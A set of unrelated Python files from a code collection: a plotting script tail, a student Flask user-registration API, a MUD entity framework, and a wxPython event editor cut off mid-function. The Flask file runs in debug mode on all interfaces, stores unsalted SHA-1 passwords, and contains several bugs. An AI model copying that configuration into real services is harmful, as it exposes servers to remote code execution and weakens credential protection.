print('Plotting rechunking time...')
filepath = f'../data/{dataset}/performance_data/rechunking_time.csv'
df = pd.read_csv(filepath)
df = df.drop_duplicates(['time_chunks', 'lon_chunks', 'lat_chunks'], keep='last')
df['time_chunks']= df['time_chunks'].replace(999, 5136)
df['lon_chunks'] = df['lon_chunks'].replace(999, 1152)
df['lat_chunks'] = df['lat_chunks'].replace(999, 721)
df = organize_df(df)
task_name = 'rechunking'
make_heatmap(
dataset,
titles_dict,
filepath,
all_lookup,
KEY='runtime_hr',
metrics_df=df,
task_name=task_name,
QUANTILE_Q=0.82,
PROCESS_CSV=False
)
# Plot archive size
print('Plotting archive size...')
filepath = f'../data/{dataset}/performance_data/archive_sizes.csv'
df = pd.read_csv(filepath)
df['archive_size'] = df['archive_size'] * 1e-9
df['time_chunks'].replace('all', 5136, inplace=True)
df['lon_chunks'].replace('all', 1152, inplace=True)
df['lat_chunks'].replace('all', 721, inplace=True)
df = organize_df(df)
task_name = 'archive_size'
make_heatmap(
dataset,
titles_dict,
filepath,
all_lookup,
KEY='archive_size',
metrics_df=df,
task_name=task_name,
QUANTILE_Q=None,
PROCESS_CSV=False
)
# Plot scatterplots
print('Plotting scatterplots...')
LOG = True
NORMS = [False, True]
task_name = 'overlay_tasks'
task_dict = {
0: f'time_series_metrics_ntrials{ntrials}',
1: f'map_one_timestep_metrics_ntrials{ntrials}'
}
filepath = f'../data/{dataset}/performance_data/{task_dict[0]}.csv'
map_filepath = f'../data/{dataset}/performance_data/{task_dict[1]}.csv'
metrics_df = data_reader.read_process_csv(filepath, timeall=all_lookup['timeall'],
lonall=all_lookup['lonall'], latall=all_lookup['latall'],
sort_by='lonlat')
map_metrics_df = data_reader.read_process_csv(map_filepath, timeall=all_lookup['timeall'],
lonall=all_lookup['lonall'], latall=all_lookup['latall'],
sort_by='lonlat')
concatenated = pd.concat([metrics_df.assign(dataset='set1'), map_metrics_df.assign(dataset='set2')])
num_colors = len(metrics_df['lonlat_product'].unique())
color_palette = sns.color_palette("inferno_r", as_cmap=True, n_colors=num_colors)
color_palette = color_palette(np.linspace(0.1, 1, num_colors))
color_palette = sns.color_palette(color_palette)
for NORM in NORMS:
pairs = norm_pairwise_combinations if NORM else pairwise_combinations
lim1 = [(10**-2, 10**2.3), (10**2, 4.5*(10**3)), (10**-2, 10**2.3)]
lim2 = [(10**1.5, 10**7.8), (10**-4, 10**0.2), (10**1.4, 10**8)]
YLIM = lim2 if NORM else lim1
fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(9,3), constrained_layout=True, dpi=150)
for ax_i, (ax, pair) in enumerate(zip(axes.flatten(), pairs)):
scatterplot_maker.plot_pairwise_metrics(ax, concatenated, pair[0], pair[1],
color_palette, titles_dict,
log=LOG, legend=False, fontsize=12,
plot_lines=True, ylim=YLIM[ax_i])
label = '_norm' if NORM else ''
if LOG:
plt.savefig(f'../data/{dataset}/scatterplots/{task_name}_log{label}.png', bbox_inches='tight')
else:
plt.savefig(f'../data/{dataset}/scatterplots/{task_name}{label}.png', bbox_inches='tight')
if __name__ == '__main__':
main() |
<reponame>Ritik19/Cloud-Computing-Project
from flask import Flask, jsonify, request, abort
from flask import Response
import sqlite3
import requests
import hashlib
import json
from flask_cors import CORS
import base64
import datetime
import string
import re
app = Flask(__name__)
CORS(app)
app.config["CORS_SUPPORTS_CREDENTIALS"] = True
count=0
def checkUserNameInDb(username):
connectionState = sqlite3.connect("user_databs.db")
cursor = connectionState.cursor()
cursor.execute("SELECT * from User WHERE username = ?",(username,))
userData = cursor.fetchall()
connectionState.close()
if (len(userData) == 0):
return 1
return 0
def checkCategoryInDb(categoryname):
connectionState = sqlite3.connect("user_databs.db")
cursor = connectionState.cursor()
cursor.execute("SELECT * from Category WHERE categoryname = ?",(categoryname,))
categoryData = cursor.fetchall()
connectionState.close()
if (len(categoryData) == 0):
return 1
return 0
def getcategory(categorydic):
connectionState = sqlite3.connect("user_databs.db")
cursor = connectionState.cursor()
cursor.execute("SELECT * from Category")
data=cursor.fetchall()
for i in data:
categorydic[i[0]]=i[1]
connectionState.commit()
connectionState.close()
return categorydic
def checkactid(actid):
connectionState = sqlite3.connect("user_databs.db")
cursor = connectionState.cursor()
cursor.execute("SELECT * from Acts WHERE actId = ?",(actid,))
actData = cursor.fetchall()
connectionState.close()
if len(actData) == 0:
return 1
return 0
def checkusername(user):
connectionState=sqlite3.connect("user_databs.db")
cursor=connectionState.cursor()
cursor.execute("SELECT username FROM User WHERE username=?",(user,))
userdata=cursor.fetchall()
connectionState.close()
if(len(userdata) == 0):
return 0
return 1
def checkcategoryname(category):
connectionState=sqlite3.connect("user_databs.db")
cursor=connectionState.cursor()
cursor.execute("SELECT categoryname from Category where categoryname=?",(category,))
catdata=cursor.fetchall()
connectionState.close()
if(len(catdata) == 0):
return 0
return 1
def imgB64decode(imgB64):
try:
base64.b64encode(base64.b64decode(imgB64)) == imgB64
except Exception as e:
return 0
else:
return 1
def imgB64decodes(category):
try:
connectionState=sqlite3.connect('user_databs.db')
cursor=connectionState.cursor()
cursor.execute('SELECT imgB64 from Acts where categoryname=?',(category,))
img=cursor.fetchall()
connectionState.close()
img.decode('base64','strict')
except Exception as e:
return 1
else:
return 0
def timecheck(timeformat):
try:
datetime.datetime.strptime(timeformat, '%d-%m-%Y:%S-%M-%H')
except:
return 0
else:
return 1
def timechecks(category):
try:
connectionState=sqlite3.connect('databse.db')
cursor=connectionState.cursor()
cursor.execute('SELECT timestamp from Acts where categoryname=?',(category,))
time=cursor.fetchall()
connectionState.close()
datetime.datetime .strptime(time, '%d-%m-%Y')
except:
return 0
else:
return 1
def checkCategory(category):
connectionState=sqlite3.connect('user_databs.db')
cursor=connectionState.cursor()
cursor.execute('SELECT * FROM Category where categoryname=?',(category,))
categorydata=cursor.fetchall()
connectionState.close()
if(len(categorydata) == 0):
return 1
return 0
def checknoofacts(category):
connectionState=sqlite3.connect('user_databs.db')
cursor=connectionState.cursor()
cursor.execute("SELECT * FROM Category WHERE categoryname=?",(category,))
actdata=cursor.fetchall()
connectionState.close()
if(len(actdata)<100):
return 0
return 1
def checkacts(category,end):
connectionState=sqlite3.connect('user_databs.db')
cursor=connectionState.cursor()
cursor.execute('SELECT * from Acts where categoryname=?',(category,))
actno=cursor.fetchall()
if(len(actno)>=end):
return 0
return 1
def checkacts1(category,end):
connectionState=sqlite3.connect('user_databs.db')
cursor=connectionState.cursor()
cursor.execute('SELECT * FROM Acts where categoryname=?',(category,))
actno=cursor.fetchall()
if(len(actno)>=end):
return 1
return 0
def checkUserPwd(username,password):
connectionState=sqlite3.connect('user_databs.db')
cursor=connectionState.cursor()
cursor.execute('SELECT username,password from Users where username=? and password=?',(username,password,))
userpwd=cursor.fetchall()
if(len(userpwd)==0):
return 1
return 0
def checkforimg(imgB64):
connectionState=sqlite3.connect('user_databs.db')
cursor=connectionState.cursor()
cursor.execute('SELECT * from Acts where imgB64=?',(imgB64,))
imgdata=cursor.fetchall()
if(len(imgdata)==0):
return 1
return 0
def checkforhash(maybe_sha):
connectionState=sqlite3.connect('user_databs.db')
cursor=connectionState.cursor()
if len(maybe_sha) != 40:
return False
try:
sha_int = int(maybe_sha, 16)
except ValueError:
return False
return True
#1.ADDING USER AND LIST ALL USERS
@app.route("/api/v1/users", methods = ['POST', 'GET' ,'DELETE','PUT'])
def addUser():
global count
if request.method == "POST":
count=count+1
user_data = request.get_json()
#user_data['password'] = (hashlib.sha1(user_data['password'].encode())).hexdigest()
if checkUserNameInDb(user_data['username']) and checkforhash(user_data['password']) :
connectionState = sqlite3.connect("user_databs.db")
cursor = connectionState.cursor()
#user_data['password'] = (hashlib.sha1(user_data['password'].encode())).hexdigest()
cursor.execute("INSERT INTO User(username, password) VALUES(?,?)",(user_data['username'], user_data['password']))
connectionState.commit()
connectionState.close()
return jsonify({}), 201
else:
#Bad request
return jsonify({}), 400
elif request.method == "GET":
count=count+1
users=[]
userpass=[]
dic={}
connectionState=sqlite3.connect("user_databs.db")
cursor=connectionState.cursor()
cursor.execute("SELECT username from User")
users_data=cursor.fetchall()
for i in users_data:
users.append(i[0])
#for i in users_data:
# userpass.append(i)
#print(userpass)
#j=0
#for i in userpass:
# print(userpass[j][0])
# print(userpass[j][1])
# j=j+1
#r=requests.post(url="http://localhost:8000/api/v1/acts",data=userpass)
connectionState.commit()
connectionState.close()
return jsonify(users),200
else:
count=count+1
#method not allowed
return jsonify({}), 405
#2.DELETE USER
@app.route("/api/v1/users/<username>", methods = ['POST', 'GET','DELETE','PUT'])
def removeUser(username):
global count
if request.method == "DELETE":
#global count
count=count+1
#if username=="":
#return jsonify({}),400
if(checkUserNameInDb(username)):
return jsonify({}),400
else:
connectionState = sqlite3.connect("user_databs.db")
cursor = connectionState.cursor()
cursor.execute("DELETE FROM User where username=?",(username,))
connectionState.commit()
connectionState.close()
return jsonify({}), 200
else:
count=count+1
return jsonify({}), 405
#3. Number of HTTP requests and reset the number http requests
@app.route('/api/v1/_count' , methods=['GET','DELETE','POST','PUT'])
def regcount():
global count
if request.method=='GET':
connectionState=sqlite3.connect('user_databs.db')
cursor=connectionState.cursor()
cntlst=[]
cntlst.append(count)
connectionState.commit()
connectionState.close()
#print(count)
return jsonify(cntlst),200
elif request.method=='DELETE':
connectionState=sqlite3.connect('user_databs.db')
cursor=connectionState.cursor()
count=0
connectionState.commit()
connectionState.close()
return jsonify({}),200
else:
return jsonify({}),405
#@app.route("/api/v1/users/cats/<name>", methods = ['POST', 'GET','DELETE','PUT'])
#def cat(name):
# r=requests.post('http://localhost:8000/api/v1/categories',data=name)
if __name__ == '__main__':
app.run(host='0.0.0.0',port = 80, debug = True)
|
# -*- coding: utf-8 -*-
"""Entities, the base of all complex MUD objects."""
# Part of Clockwork MUD Server (https://github.com/whutch/cwmud)
# :copyright: (c) 2008 - 2017 <NAME>
# :license: MIT (https://github.com/whutch/cwmud/blob/master/LICENSE.txt)
from copy import deepcopy
from weakref import WeakValueDictionary
from pylru import lrucache
from .attributes import Attribute, DataBlob, Unset
from .json import JSONStore
from .logs import get_logger
from .storage import STORES
from .timing import TIMERS
from .utils import class_name, int_to_base_n, joins
from .utils.exceptions import AlreadyExists
from .utils.mixins import (HasFlags, HasFlagsMeta, HasTags,
HasWeaks, HasWeaksMeta)
log = get_logger("entities")
# Do NOT change these after your server has started generating UIDs or you
# risk running into streaks of duplicate UIDs.
_uid_timecode_multiplier = 10000
_uid_timecode_charset = ("0123456789aAbBcCdDeEfFgGhHijJkKLmM"
"nNopPqQrRstTuUvVwWxXyYzZ")
# I left out "I", "l", "O", and "S" to make time codes easier to distinguish
# regardless of font. If my base 58 math is to be believed, this character set
# should generate eight-digit time codes with 100 microsecond precision until
# October 25th, 2375, and then nine-digit codes well into the 26th millennium.
class EntityManager:
"""A manager for entity types."""
def __init__(self):
"""Create a new entity manager."""
self._entities = {}
def __contains__(self, name):
return name in self._entities
def __getitem__(self, name):
return self._entities[name]
def register(self, entity):
"""Register an entity type.
This method can be used to decorate an Entity class.
:param Entity entity: The entity to be registered
:returns Entity: The registered entity
:raises AlreadyExists: If an entity with that class name already exists
:raises TypeError: If the supplied or decorated class is not a
subclass of Entity
"""
if (not isinstance(entity, type)
or not issubclass(entity, Entity)):
raise TypeError("must be subclass of Entity to register")
name = entity.__name__
if name in self._entities:
raise AlreadyExists(name, self._entities[name], entity)
self._entities[name] = entity
return entity
def save(self):
"""Save the dirty instances of all registered entities."""
count = 0
for entity in self._entities.values():
for instance in entity._instances.values():
if instance.is_savable and instance.is_dirty:
instance.save()
count += 1
if count:
log.debug("Saved %s dirty entities.", count)
class _EntityMeta(HasFlagsMeta, HasWeaksMeta):
def __init__(cls, name, bases, namespace):
super().__init__(name, bases, namespace)
cls._base_blob = type(name + "BaseBlob", (DataBlob,), {})
cls._instances = WeakValueDictionary()
cls._caches = {}
cls.register_cache("uid")
def register_blob(cls, name):
"""Decorate a data blob to register it on this entity.
:param str name: The name of the field to store the blob
:returns DataBlob: The decorated blob
:raises AlreadyExists: If the given name already exists as an attr
:raises TypeError: If the supplied or decorated class is not a
subclass of DataBlob
"""
if hasattr(cls, name):
raise AlreadyExists(name, getattr(cls, name))
def _inner(blob_class):
if (not isinstance(blob_class, type)
or not issubclass(blob_class, DataBlob)):
raise TypeError("must be subclass of DataBlob to register")
cls._base_blob._blobs[name] = blob_class
prop = property(lambda s: s._base_blob._blobs[name])
setattr(cls, name, prop)
return blob_class
return _inner
def register_attr(cls, name):
"""Decorate an attribute to register it on this entity.
:param str name: The name of the field to store the attribute
:returns Attribute: The decorated attribute
:raises AlreadyExists: If the given name already exists as an attr
:raises TypeError: If the supplied or decorated class is not a
subclass of Attribute
"""
if hasattr(cls, name):
raise AlreadyExists(name, getattr(cls, name))
def _inner(attr_class):
if (not isinstance(attr_class, type)
or not issubclass(attr_class, Attribute)):
raise TypeError("must be subclass of Attribute to register")
cls._base_blob._attrs[name] = attr_class
getter = lambda s: s._base_blob._get_attr_val(name)
setter = (lambda s, v: s._base_blob._set_attr_val(name, v)
if not attr_class._read_only else None)
setattr(cls, name, property(getter, setter))
return attr_class
return _inner
@staticmethod
def _cache_eject_callback(key, entity):
"""A callback for when entities are ejected from a cache.
When an entity is dumped from all of it's caches, there's a chance
it could fall out of scope before every being saved, so we save it
on ejection to be sure.
:param key: The ejected entity's cache key
:param Entity entity: The ejected entity
:return None:
"""
entity.save()
def register_cache(cls, key, size=512):
"""Create a new cache for this entity, keyed by attribute.
Currently these caches are not searched, they merely serve as another
reference to keep their entries in _instances alive.
There is support for caching UIDs and Attribute values when
they change, if you want to register anything else (such as bare
properties not tied to an Attribute) then you'll need to make sure to
update the cache yourself when their values change.
:param str key: The attribute name to use as a key
:param int size: The size of the cache to create
:returns None:
:raises KeyError: If a cache already exists for `key`
"""
if key in cls._caches:
raise AlreadyExists(key, cls._caches[key])
cache = lrucache(size, cls._cache_eject_callback)
cls._caches[key] = cache
# Fill the cache with any existing entity data.
for entity in cls._instances.values():
attr_value = getattr(entity, key)
if attr_value not in (None, Unset):
if attr_value not in cache:
cache[attr_value] = {entity}
else:
cache[attr_value].add(entity)
class Entity(HasFlags, HasTags, HasWeaks, metaclass=_EntityMeta):
"""The base of all persistent objects in the game."""
_store = STORES.register("entities", JSONStore("entities"))
_uid_code = "E"
type = "entity"
# These are overridden in the metaclass, I just put them here
# to avoid a lot of unresolved reference errors in IDE introspection.
_base_blob = None
_instances = {}
_caches = {}
__uid_timecode = 0 # Used internally for UID creation.
def __init__(self, data=None, active=False, savable=True):
super().__init__()
def _build_base_blob(cls, blob=self._base_blob(self), checked=set()):
# Recursively update our base blob with the blobs of our parents.
for base in cls.__bases__:
_build_base_blob(base)
# We don't need to do anything with the blob returned by this
# because we're abusing the mutability of default arguments.
if issubclass(cls, Entity):
if cls not in checked: # pragma: no cover
blob._update(cls._base_blob(self))
checked.add(cls)
return blob
self._base_blob = _build_base_blob(self.__class__)
self._dirty = False
self._savable = savable
# Never, ever manually change an object's UID! There are no checks
# for removing the old UID from the store, updating UID links, or
# anything else like that. Bad things will happen!
self._uid = None
if data and "uid" in data:
self._set_uid(data.pop("uid"))
else:
self._set_uid(self.make_uid())
# An active entity is considered "in play", inactive entities are
# hidden from the game world.
self.active = active
if data is not None:
self.deserialize(data)
def __repr__(self):
return joins("Entity<", self.uid, ">", sep="")
def __hash__(self):
if not self.uid:
raise ValueError("cannot hash entity with no uid")
return hash(self.uid)
def __eq__(self, other):
if not hasattr(other, "uid") or self.uid != other.uid:
return False
else:
return True
@property
def uid(self):
"""Return this entity's UID."""
return self._uid
def _set_uid(self, uid):
"""Set this entity's UID.
To ensure cache integrity, this should be the only place that an
entity's UID is updated. This *only* updates references in the
internal caches, do not rely on it to change anything in the store
or any other external references (links from other entities).
"""
cache = self._caches.get("uid")
if self._uid is not None:
if self._uid in self._instances:
del self._instances[self._uid]
if self._uid in cache:
del cache[self._uid]
self._uid = uid
self._instances[uid] = self
cache[uid] = {self}
@property
def is_dirty(self):
"""Return whether this entity is dirty and needs to be saved."""
return self._dirty
@property
def is_savable(self):
"""Return whether this entity can be saved."""
return self._store and self._savable
def _flags_changed(self):
self.dirty()
def _tags_changed(self):
self.dirty()
def dirty(self):
"""Mark this entity as dirty so that it will be saved."""
self._dirty = True
def serialize(self):
"""Create a sanitized dict from the data on this entity.
:returns dict: The serialized data
"""
data = self._base_blob.serialize()
data["type"] = class_name(self)
data["uid"] = self._uid
data["flags"] = self.flags.as_tuple
data["tags"] = deepcopy(self.tags.as_dict)
return data
def deserialize(self, data):
"""Update this entity's data using values from a dict.
:param dict data: The data to deserialize
:returns None:
"""
if "type" in data:
del data["type"]
if "uid" in data:
self._set_uid(data.pop("uid"))
if "flags" in data:
self.flags.add(*data.pop("flags"))
if "tags" in data:
self.tags.clear()
self.tags.update(data.pop("tags"))
self._base_blob.deserialize(data)
@classmethod
def reconstruct(cls, data):
"""Reconstruct an entity from a dict of its data.
The given `data` must include a "type" key with the name of a
registered Entity class as its value.
This differs from the deserialize method in that this method will
return an entity created from a class specified in the data, rather
than merging the data into an existing instance of a (potentially
different) class.
:param dict data: The data to reconstruct the entity from
:returns Entity: The reconstructed entity instance
:raises KeyError: If `data` has no "type" key or the value of the
given key is not a registered Entity class
"""
entity_name = data.pop("type", None)
if not entity_name or entity_name not in ENTITIES:
raise KeyError("failed to reconstruct entity: bad class key")
entity = ENTITIES[entity_name](data)
log.debug("Reconstructed %s (%s).", entity, entity.uid)
return entity
@classmethod
def make_uid(cls):
"""Create a UID for this entity.
UIDs are in the form "C-TTTTTTTT", where C is the entity code and T
is the current time code. (Ex. "E-6jQZ4zvH")
:returns str: The new UID
"""
big_time = TIMERS.time * _uid_timecode_multiplier
if big_time > Entity.__uid_timecode:
Entity.__uid_timecode = big_time
else:
Entity.__uid_timecode += 1
timecode_string = int_to_base_n(Entity.__uid_timecode,
_uid_timecode_charset)
uid = "-".join((cls._uid_code, timecode_string))
return uid
@classmethod
def _find_in_cache(cls, ignore_keys=(), **attr_value_pairs):
found = set()
for key, entity in cls._instances.items():
if key in ignore_keys:
continue
for attr, value in attr_value_pairs.items():
if getattr(entity, attr) != value:
break
else:
found.add(entity)
return found
@classmethod
def find(cls, cache=True, store=True, subclasses=True,
ignore_keys=(), **attr_value_pairs):
"""Find one or more entities by one of their attribute values.
:param bool cache: Whether to check the _instances cache
:param bool store: Whether to check the store
:param bool subclasses: Whether to check subclasses as well
:param iterable ignore_keys: A sequence of keys to ignore
:param iterable attr_value_pairs: Pairs of attributes and values to
match against
:returns list: A list of found entities, if any
:raises SyntaxError: If both `cache` and `store` are False
"""
if not cache and not store:
raise SyntaxError("can't find without cache or store")
found = set()
# We might be recursing from a parent class, so if they passed
# us an existing set we want to use the same one.
if ignore_keys == ():
ignore_keys = set()
elif not isinstance(ignore_keys, set):
ignore_keys = set(ignore_keys)
if cache:
found.update(cls._find_in_cache(ignore_keys=ignore_keys,
**attr_value_pairs))
ignore_keys.update(cls._instances.keys())
if subclasses:
for subclass in cls.__subclasses__():
found.update(subclass.find(store=False,
ignore_keys=ignore_keys,
**attr_value_pairs))
if store:
found_uids = cls._store.find(ignore_keys=ignore_keys,
**attr_value_pairs)
found.update([cls.reconstruct(cls._store.get(uid))
for uid in found_uids])
ignore_keys.update(cls._store.keys())
if subclasses:
for subclass in cls.__subclasses__():
found.update(subclass.find(cache=False,
ignore_keys=ignore_keys,
**attr_value_pairs))
return list(found)
@classmethod
def find_relations(cls, **attr_value_pairs):
"""Find one or more entities by a relation to another entity.
The purpose of this versus `find` is to match related entities by
direct reference (in the cache) or by UID (in the store) in one call.
:param iterable attr_value_pairs: Pairs of attributes and values to
match against
:returns list: A list of found entities, if any
:raises TypeError: If any of the pairs' values are not entity instances
"""
found = set(cls.find(store=False, **attr_value_pairs))
found_keys = set(entity.uid for entity in found)
for key, value in attr_value_pairs.items():
if not isinstance(value, Entity):
raise TypeError(joins("relation value is not entity:", value))
attr_value_pairs[key] = value.uid
found.update(cls.find(cache=False, ignore_keys=found_keys,
**attr_value_pairs))
return list(found)
@classmethod
def get(cls, key=None, default=None, cache=True, store=True,
subclasses=True, **attr_value_pairs):
"""Get an entity by one or more of their attribute values.
:param key: The key to get; if given `attr_value_pairs` will be ignored
:param default: A default value to return if no entity is found; if
default is an exception, it will be raised instead
:param bool cache: Whether to check the caches
:param bool store: Whether to check the store
:param bool subclasses: Whether to check subclasses as well
:param iterable attr_value_pairs: Pairs of attributes and values to
match against
:returns Entity: A matching entity, or default
:raises KeyError: If more than one entity matches the given values
"""
if key is None:
matches = cls.find(cache=cache, store=store,
subclasses=subclasses,
**attr_value_pairs)
if len(matches) > 1:
raise KeyError(joins("get returned more than one match:",
matches, "using attrs", attr_value_pairs))
if matches:
return matches[0]
else:
if cache:
if key in cls._instances:
return cls._instances[key]
if subclasses:
for subclass in cls.__subclasses__():
found = subclass.get(key, cache=cache, store=store)
if found:
return found
if store:
if cls._store.has(key):
return cls.reconstruct(cls._store.get(key))
# Nothing was found.
if isinstance(default, type) and issubclass(default, Exception):
raise default
else:
return default
@classmethod
def all(cls):
"""Return all active instances of this entity.
:returns list: All active instances of this entity type
"""
return [instance for instance in cls._instances.values()
if instance.active]
def save(self):
"""Store this entity."""
if not self.is_savable:
log.warning("Tried to save non-savable entity %s!", self)
return
if "_old_key" in self.tags:
# The entity's key has changed, so we need to handle that.
old_key = self.tags["_old_key"]
if self._store.has(old_key):
self._store.delete(old_key)
del self.tags["_old_key"]
data = self.serialize()
self._store.put(self.uid, data)
self._dirty = False
def revert(self):
"""Revert this entity to a previously saved state."""
if not self._store:
raise TypeError("cannot revert entity with no store")
data = self._store.get(self.uid)
if self.uid != data["uid"]:
raise ValueError(joins("uid mismatch trying to revert", self))
self.deserialize(data)
self._dirty = False
def clone(self):
"""Create a new entity with a copy of this entity's data.
:returns Entity: The new, cloned entity
"""
entity_class = type(self)
data = self.serialize()
del data["uid"]
new_entity = entity_class(data)
return new_entity
def delete(self):
"""Delete this entity from the caches and its store."""
for attr, cache in self._caches.items():
attr_value = getattr(self, attr)
if attr_value in cache:
del cache[attr_value]
if self._store and self._store.has(self.uid):
self._store.delete(self.uid)
if self.uid in self._instances:
del self._instances[self.uid]
# We create a global EntityManager here for convenience, and while the
# server will generally only need one to work with, they are NOT singletons
# and you can make more EntityManager instances if you like.
ENTITIES = EntityManager()
@Entity.register_attr("version")
class EntityVersion(Attribute):
"""An entity's version."""
default = 1
@classmethod
def validate(cls, entity, new_value):
if not isinstance(new_value, int):
raise TypeError("entity version must be a number")
return new_value
|
from dataclasses import dataclass
from typing import List
from gui import generated
from formats.event import Event
from formats.gds import GDSCommand
import wx
import wx.propgrid
from gui.PygamePreviewer import PygamePreviewer
from previewers.event.EventPlayer import EventPlayer
class ButtonNoTab(wx.Button):
def AcceptsFocusFromKeyboard(self):
return False
@dataclass
class CommandRepr:
command_name: str
params: List[List]
@staticmethod
def from_gds(gds_command: GDSCommand, event: Event):
name, params, param_names = event.convert_command(gds_command, for_code=False)
param_dict = []
for i in range(len(params)):
param_dict.append([param_names[i], type(params[i]).__name__, params[i]])
if param_dict[-1][1] == "int" and name != "Fade" and i != len(params) - 1:
param_dict[-1][1] = "uint"
if name == "Dialogue":
param_dict[-1][1] = "long_str"
command_repr = CommandRepr(name, param_dict)
return command_repr
def to_gds(self, event: Event):
command = event.revert_command(self.command_name, [param[2] for param in self.params])
return command
class CommandPanel(wx.Panel):
def __init__(self, command_repr: CommandRepr, *args, **kwargs):
super(CommandPanel, self).__init__(*args, **kwargs)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer2 = wx.BoxSizer(wx.HORIZONTAL)
self.command_repr = command_repr
self.command_name_label = wx.StaticText(self, wx.ID_ANY, command_repr.command_name, wx.DefaultPosition,
wx.DefaultSize, wx.ALIGN_CENTER_HORIZONTAL)
self.command_name_label.SetSize((112, -1))
self.command_name_label.Wrap(-1)
self.move_up_btn = ButtonNoTab(self, wx.ID_ANY, "Move Up", wx.DefaultPosition, wx.DefaultSize, 0)
self.move_up_btn.SetSize((112, -1))
self.move_down_btn = ButtonNoTab(self, wx.ID_ANY, "Move Down", wx.DefaultPosition, wx.DefaultSize, 0)
self.move_down_btn.SetSize((112, -1))
self.delete_btn = ButtonNoTab(self, wx.ID_ANY, "Delete", wx.DefaultPosition, wx.DefaultSize, 0)
self.delete_btn.SetSize((112, -1))
self.property_grid = wx.propgrid.PropertyGrid(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,
wx.propgrid.PG_DEFAULT_STYLE | wx.propgrid.PG_HIDE_MARGIN |
wx.propgrid.PG_SPLITTER_AUTO_CENTER |
wx.propgrid.PG_STATIC_LAYOUT | wx.propgrid.PG_STATIC_SPLITTER |
wx.TAB_TRAVERSAL)
self.property_grid.SetMaxSize((470, self.property_grid.GetRowHeight() * len(command_repr.params) + 4))
self.property_grid.Bind(wx.EVT_MOUSEWHEEL, self.scroll_pg)
self.properties: List[wx.propgrid.PGProperty] = []
for param in command_repr.params:
p_label, p_type, p_value = param
if p_type == "uint":
property_ = self.property_grid.Append(wx.propgrid.UIntProperty(p_label, p_label, p_value))
elif p_type == "int":
property_ = self.property_grid.Append(wx.propgrid.IntProperty(p_label, p_label, p_value))
elif p_type == "float":
property_ = self.property_grid.Append(wx.propgrid.FloatProperty(p_label, p_label, p_value))
elif p_type == "str":
property_ = self.property_grid.Append(wx.propgrid.StringProperty(p_label, p_label, p_value))
elif p_type == "long_str":
property_ = self.property_grid.Append(wx.propgrid.LongStringProperty(p_label, p_label, p_value))
elif p_type == "bool":
property_ = self.property_grid.Append(wx.propgrid.BoolProperty(p_label, p_label, p_value))
elif p_value is None:
param[1] = "int"
property_ = self.property_grid.Append(wx.propgrid.IntProperty(p_label, p_label, -1))
else:
continue
property_: wx.propgrid.PGProperty
self.properties.append(property_)
sizer2.Add(self.command_name_label, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.command_name_label.Layout()
sizer2.Add(self.move_up_btn, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.move_up_btn.Layout()
sizer2.Add(self.move_down_btn, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.move_down_btn.Layout()
sizer2.Add(self.delete_btn, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.delete_btn.Layout()
sizer.Add(sizer2, 0, wx.ALL | wx.EXPAND, 5)
sizer.Add(self.property_grid, 0, wx.ALL | wx.EXPAND, 5)
self.property_grid.Layout()
self.SetSizer(sizer)
self.Layout()
sizer.Fit(self)
self.move_up_btn.Bind(wx.EVT_BUTTON, self.move_up)
self.move_down_btn.Bind(wx.EVT_BUTTON, self.move_down)
self.delete_btn.Bind(wx.EVT_BUTTON, self.delete)
self.property_grid.AddActionTrigger(wx.propgrid.PG_ACTION_NEXT_PROPERTY, wx.WXK_DOWN)
self.property_grid.AddActionTrigger(wx.propgrid.PG_ACTION_PREV_PROPERTY, wx.WXK_UP)
self.property_grid.DedicateKey(wx.WXK_DOWN)
self.property_grid.DedicateKey(wx.WXK_UP)
def get_command_repr(self) -> CommandRepr:
for i, property_ in enumerate(self.properties):
if self.command_repr.params[i][1] == "long_str":
self.command_repr.params[i][2] = property_.GetValue().replace(r"\n", "\n").replace(r"\\", "\\")
continue
self.command_repr.params[i][2] = property_.GetValue()
return self.command_repr
def move_up(self, _):
self.GetGrandParent().move_up(self)
def move_down(self, _):
self.GetGrandParent().move_down(self)
def delete(self, _):
self.GetGrandParent().delete(self)
def scroll_pg(self, event):
parent: wx.EvtHandler = self.GetParent().GetEventHandler()
parent.ProcessEvent(event)
event.Skip()
class EventEditor(generated.EventEditor):
def __init__(self, *args, **kwargs):
super(EventEditor, self).__init__(*args, **kwargs)
self.menu = wx.Menu()
self.event: [Event] = None
self.previewer: PygamePreviewer = PygamePreviewer.INSTANCE
self.command_panels: List[CommandPanel] = []
main_editor = self.GetGrandParent()
def add_menu_item(menu, title, handler):
ase_menu_item = wx.MenuItem(menu, wx.ID_ANY, title)
menu.Append(ase_menu_item)
main_editor.Bind(wx.EVT_MENU, handler, id=ase_menu_item.GetId())
add_menu_item(self.menu, "Apply", self.apply_changes)
add_menu_item(self.menu, "Save", self.save_changes)
def add_command_panel(self, command_repr: CommandRepr):
sizer: wx.Sizer = self.event_commands.GetSizer()
command_panel = CommandPanel(command_repr, self.event_commands, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,
wx.TAB_TRAVERSAL)
sizer.Add(command_panel, 0, wx.ALL | wx.EXPAND, 5)
command_panel.Layout()
self.event_commands.Layout()
sizer.Layout()
self.Layout()
def set_event_info(self):
self.m_mapTopID.SetValue(self.event.map_top_id)
self.m_mapBtmID.SetValue(self.event.map_bottom_id)
self.char_id0.SetValue(self.event.characters[0])
self.char_id1.SetValue(self.event.characters[1])
self.char_id2.SetValue(self.event.characters[2])
self.char_id3.SetValue(self.event.characters[3])
self.char_id4.SetValue(self.event.characters[4])
self.char_id5.SetValue(self.event.characters[5])
self.char_id6.SetValue(self.event.characters[6])
self.char_id7.SetValue(self.event.characters[7])
self.char_slot0.SetValue(self.event.characters_pos[0])
self.char_slot1.SetValue(self.event.characters_pos[1])
self.char_slot2.SetValue(self.event.characters_pos[2])
self.char_slot3.SetValue(self.event.characters_pos[3])
self.char_slot4.SetValue(self.event.characters_pos[4])
self.char_slot5.SetValue(self.event.characters_pos[5])
self.char_slot6.SetValue(self.event.characters_pos[6])
self.char_slot7.SetValue(self.event.characters_pos[7])
self.char_visible0.SetValue(self.event.characters_shown[0])
self.char_visible1.SetValue(self.event.characters_shown[1])
self.char_visible2.SetValue(self.event.characters_shown[2])
